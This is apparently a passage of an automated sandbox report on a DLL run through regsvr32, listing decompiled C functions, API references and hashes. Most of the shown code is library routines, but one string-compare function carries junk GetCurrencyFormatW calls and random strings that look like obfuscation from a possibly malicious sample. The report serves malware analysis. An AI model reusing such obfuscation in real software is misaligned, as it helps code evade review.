                                                                                                            • lstrlenA.KERNEL32(00000000,000000FF,00000050,10012995,00000000,00000001,?,?,000000FF,?,?,?), ref: 1001D23D
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D286
                                                                                                              • Part of subcall function 10005007: _memcpy_s.LIBCMT ref: 10005017
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D2FD
                                                                                                            • _memset.LIBCMT ref: 1001D30D
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D336
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001D3EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2586305615-0
                                                                                                            • Opcode ID: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
                                                                                                            • Instruction ID: 6804580c6d9db2e853958beb5b9c70fac7fcc155cdbb3eab0184ec39f158d97d
                                                                                                            • Opcode Fuzzy Hash: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
                                                                                                            • Instruction Fuzzy Hash: 2EA1AE35C00649DBDF11EFE4C885AAEBBB1FF04354F20415AE825AB291D774EE81DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010915 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10010915(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1001FBF7(E10033B54, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100105C8(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x100384d0;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100106E4( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100010C9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100010C9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E10004E3A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10020F40(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E1001FC9C(_t36);
			}














                                                                                                            0x10010915
                                                                                                            0x1001091c
                                                                                                            0x10010921
                                                                                                            0x10010923
                                                                                                            0x10010926
                                                                                                            0x1001092a
                                                                                                            0x1001092d
                                                                                                            0x10010933
                                                                                                            0x1001093a
                                                                                                            0x10010a3c
                                                                                                            0x10010949
                                                                                                            0x10010951
                                                                                                            0x10010955
                                                                                                            0x10010989
                                                                                                            0x1001098c
                                                                                                            0x10010991
                                                                                                            0x10010993
                                                                                                            0x1001099f
                                                                                                            0x1001099f
                                                                                                            0x10010995
                                                                                                            0x10010995
                                                                                                            0x1001099b
                                                                                                            0x1001099b
                                                                                                            0x100109a1
                                                                                                            0x100109a6
                                                                                                            0x100109a9
                                                                                                            0x100109ac
                                                                                                            0x100109af
                                                                                                            0x00000000
                                                                                                            0x10010957
                                                                                                            0x10010957
                                                                                                            0x1001095d
                                                                                                            0x1001096c
                                                                                                            0x1001096c
                                                                                                            0x1001096f
                                                                                                            0x100109d3
                                                                                                            0x100109d9
                                                                                                            0x100109de
                                                                                                            0x10010971
                                                                                                            0x10010976
                                                                                                            0x1001097c
                                                                                                            0x1001097f
                                                                                                            0x1001097f
                                                                                                            0x100109e4
                                                                                                            0x100109e6
                                                                                                            0x100109eb
                                                                                                            0x100109f1
                                                                                                            0x100109f1
                                                                                                            0x100109f9
                                                                                                            0x10010a0a
                                                                                                            0x10010a16
                                                                                                            0x10010a1b
                                                                                                            0x10010a21
                                                                                                            0x10010a21
                                                                                                            0x1001095d
                                                                                                            0x10010a24
                                                                                                            0x10010a29
                                                                                                            0x10010a33
                                                                                                            0x10010a33
                                                                                                            0x10010a3c
                                                                                                            0x10010a3c
                                                                                                            0x10010a47

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001091C
                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10010ACA,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001092D
                                                                                                            • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 1001094B
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 1001097F
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
                                                                                                            • _memset.LIBCMT ref: 10010A0A
                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1891723912-0
                                                                                                            • Opcode ID: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
                                                                                                            • Instruction ID: c7db6ee6c4a6de8547c75bf432caa67de510ee99b88e2ce085b1988c099b2997
                                                                                                            • Opcode Fuzzy Hash: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
                                                                                                            • Instruction Fuzzy Hash: 5431BC70600606AFE721DF10CC95C5ABBB5FF04350B61C52AF9869F562CBB1ED90CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001395 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001395(signed short* _a4, signed short* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t31;
				void* _t34;
				signed int _t36;
				short* _t56;
				short* _t76;

				_t31 = E10001380(_a4);
				if(_t31 == E10001380(_a8)) {
					_v4 = _v4 & 0x00000000;
					if(E10001380(_a4) <= 0) {
						L12:
						_t34 = 0;
						L13:
						return _t34;
					}
					_t76 = L"xadqsavcbdfewescGADW";
					_t56 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t36 =  *_a4 & 0x0000ffff;
						_v8 = _t36;
						_v12 =  *_a8 & 0x0000ffff;
						if(_t36 >= 0x41 && (_v8 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440dc + 0x5a) {
							_v8 = _v8 + GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20;
						}
						if(_v12 >= 0x41 && (_v12 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x5a) {
							_t19 = GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20; // 0x61
							_v12 = _v12 + _t19;
						}
						if(_v8 != _v12) {
							break;
						}
						_a4 =  &(_a4[1]);
						_v4 = _v4 + 1;
						_a8 =  &(_a8[1]);
						if(_v4 < E10001380(_a4)) {
							continue;
						}
						goto L12;
					}
					_t34 = 1;
					goto L13;
				}
				return 1;
			}











                                                                                                            0x1000139c
                                                                                                            0x100013b0
                                                                                                            0x100013ba
                                                                                                            0x100013cf
                                                                                                            0x100014c0
                                                                                                            0x100014c0
                                                                                                            0x100014c2
                                                                                                            0x00000000
                                                                                                            0x100014c5
                                                                                                            0x100013db
                                                                                                            0x100013e0
                                                                                                            0x100013ea
                                                                                                            0x100013ee
                                                                                                            0x100013fc
                                                                                                            0x10001400
                                                                                                            0x10001404
                                                                                                            0x10001444
                                                                                                            0x10001444
                                                                                                            0x1000144e
                                                                                                            0x1000148a
                                                                                                            0x1000148e
                                                                                                            0x1000148e
                                                                                                            0x1000149c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000149e
                                                                                                            0x100014a7
                                                                                                            0x100014ab
                                                                                                            0x100014ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100014ba
                                                                                                            0x100014cc
                                                                                                            0x00000000
                                                                                                            0x100014cc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001412
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001433
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000145C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000147D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: A$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-1548561649
                                                                                                            • Opcode ID: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
                                                                                                            • Instruction ID: 41e55657c6f233ddb2d2aa4512fb1aa83921a4b3024967986a1fac65e9f116a1
                                                                                                            • Opcode Fuzzy Hash: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
                                                                                                            • Instruction Fuzzy Hash: 8B31E434608346AFE704DF51DC81F6BBBE8FB85789F10481EFA84961D0E7B49948CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016311 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016311(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1001FBC4(E100340BB, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E10014BD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1003b26c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1001FC9C(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1003b2fc, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E100131E9(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E1001E462(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E100131AB(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1003b30c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E100149D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1003b1ec, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}











































                                                                                                            0x10016311
                                                                                                            0x10016318
                                                                                                            0x1001631d
                                                                                                            0x1001631f
                                                                                                            0x10016324
                                                                                                            0x10016329
                                                                                                            0x1001632c
                                                                                                            0x1001634d
                                                                                                            0x10016353
                                                                                                            0x10016356
                                                                                                            0x10016359
                                                                                                            0x1001635c
                                                                                                            0x10016365
                                                                                                            0x1001636d
                                                                                                            0x10016370
                                                                                                            0x100163a3
                                                                                                            0x100163a3
                                                                                                            0x100163a8
                                                                                                            0x1001640d
                                                                                                            0x10016410
                                                                                                            0x1001647c
                                                                                                            0x1001647c
                                                                                                            0x10016480
                                                                                                            0x1001648a
                                                                                                            0x1001648c
                                                                                                            0x1001648e
                                                                                                            0x100165dd
                                                                                                            0x100165e0
                                                                                                            0x100165fa
                                                                                                            0x100165fa
                                                                                                            0x100165ff
                                                                                                            0x10016604
                                                                                                            0x10016604
                                                                                                            0x1001660a
                                                                                                            0x10016611
                                                                                                            0x10016611
                                                                                                            0x10016618
                                                                                                            0x1001661b
                                                                                                            0x10016620
                                                                                                            0x10016620
                                                                                                            0x100165e2
                                                                                                            0x100165e2
                                                                                                            0x100165e6
                                                                                                            0x100165ed
                                                                                                            0x100165f0
                                                                                                            0x100165f5
                                                                                                            0x100165f8
                                                                                                            0x100165f8
                                                                                                            0x00000000
                                                                                                            0x100165e6
                                                                                                            0x10016494
                                                                                                            0x10016496
                                                                                                            0x100164f0
                                                                                                            0x100164f3
                                                                                                            0x100165a5
                                                                                                            0x100165ac
                                                                                                            0x100165ac
                                                                                                            0x100165af
                                                                                                            0x100165b2
                                                                                                            0x100165b5
                                                                                                            0x100165b8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100165bd
                                                                                                            0x100165bf
                                                                                                            0x100165c9
                                                                                                            0x100165cb
                                                                                                            0x100165da
                                                                                                            0x100165da
                                                                                                            0x100165c9
                                                                                                            0x00000000
                                                                                                            0x100165bd
                                                                                                            0x100164fd
                                                                                                            0x10016500
                                                                                                            0x10016502
                                                                                                            0x10016505
                                                                                                            0x1001653e
                                                                                                            0x1001653e
                                                                                                            0x10016545
                                                                                                            0x10016548
                                                                                                            0x10016548
                                                                                                            0x1001654b
                                                                                                            0x1001654e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016550
                                                                                                            0x10016559
                                                                                                            0x1001655f
                                                                                                            0x10016561
                                                                                                            0x10016564
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016566
                                                                                                            0x10016572
                                                                                                            0x10016575
                                                                                                            0x1001657b
                                                                                                            0x1001657d
                                                                                                            0x10016580
                                                                                                            0x10016582
                                                                                                            0x1001658e
                                                                                                            0x10016591
                                                                                                            0x10016597
                                                                                                            0x10016597
                                                                                                            0x1001659a
                                                                                                            0x1001659d
                                                                                                            0x100165a0
                                                                                                            0x00000000
                                                                                                            0x100165a0
                                                                                                            0x10016507
                                                                                                            0x1001650e
                                                                                                            0x10016510
                                                                                                            0x10016516
                                                                                                            0x10016518
                                                                                                            0x1001651b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001651e
                                                                                                            0x10016524
                                                                                                            0x10016526
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016530
                                                                                                            0x10016536
                                                                                                            0x00000000
                                                                                                            0x10016536
                                                                                                            0x10016509
                                                                                                            0x1001650c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001650c
                                                                                                            0x10016498
                                                                                                            0x1001649f
                                                                                                            0x100164a2
                                                                                                            0x100164a8
                                                                                                            0x100164aa
                                                                                                            0x100164ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100164b3
                                                                                                            0x100164c0
                                                                                                            0x100164c3
                                                                                                            0x100164c9
                                                                                                            0x100164cb
                                                                                                            0x100164ce
                                                                                                            0x100164d0
                                                                                                            0x100164dc
                                                                                                            0x100164df
                                                                                                            0x100164e5
                                                                                                            0x100164e5
                                                                                                            0x100164e8
                                                                                                            0x00000000
                                                                                                            0x100164e8
                                                                                                            0x10016412
                                                                                                            0x10016412
                                                                                                            0x10016416
                                                                                                            0x10016420
                                                                                                            0x10016422
                                                                                                            0x10016424
                                                                                                            0x00000000
                                                                                                            0x10016426
                                                                                                            0x10016426
                                                                                                            0x10016428
                                                                                                            0x10016444
                                                                                                            0x10016450
                                                                                                            0x10016453
                                                                                                            0x10016458
                                                                                                            0x10016462
                                                                                                            0x10016465
                                                                                                            0x10016465
                                                                                                            0x10016465
                                                                                                            0x1001646c
                                                                                                            0x1001646f
                                                                                                            0x1001642a
                                                                                                            0x1001642a
                                                                                                            0x10016433
                                                                                                            0x10016433
                                                                                                            0x10016474
                                                                                                            0x00000000
                                                                                                            0x10016474
                                                                                                            0x10016424
                                                                                                            0x100163ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100163b3
                                                                                                            0x100163ba
                                                                                                            0x100163bb
                                                                                                            0x100163c0
                                                                                                            0x100163c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100163c9
                                                                                                            0x100163ca
                                                                                                            0x100163cb
                                                                                                            0x100163cc
                                                                                                            0x100163d5
                                                                                                            0x00000000
                                                                                                            0x100163d7
                                                                                                            0x100163e6
                                                                                                            0x100163e9
                                                                                                            0x100163ec
                                                                                                            0x100163f9
                                                                                                            0x100163fc
                                                                                                            0x10016402
                                                                                                            0x10016405
                                                                                                            0x00000000
                                                                                                            0x10016405
                                                                                                            0x100163d5
                                                                                                            0x10016372
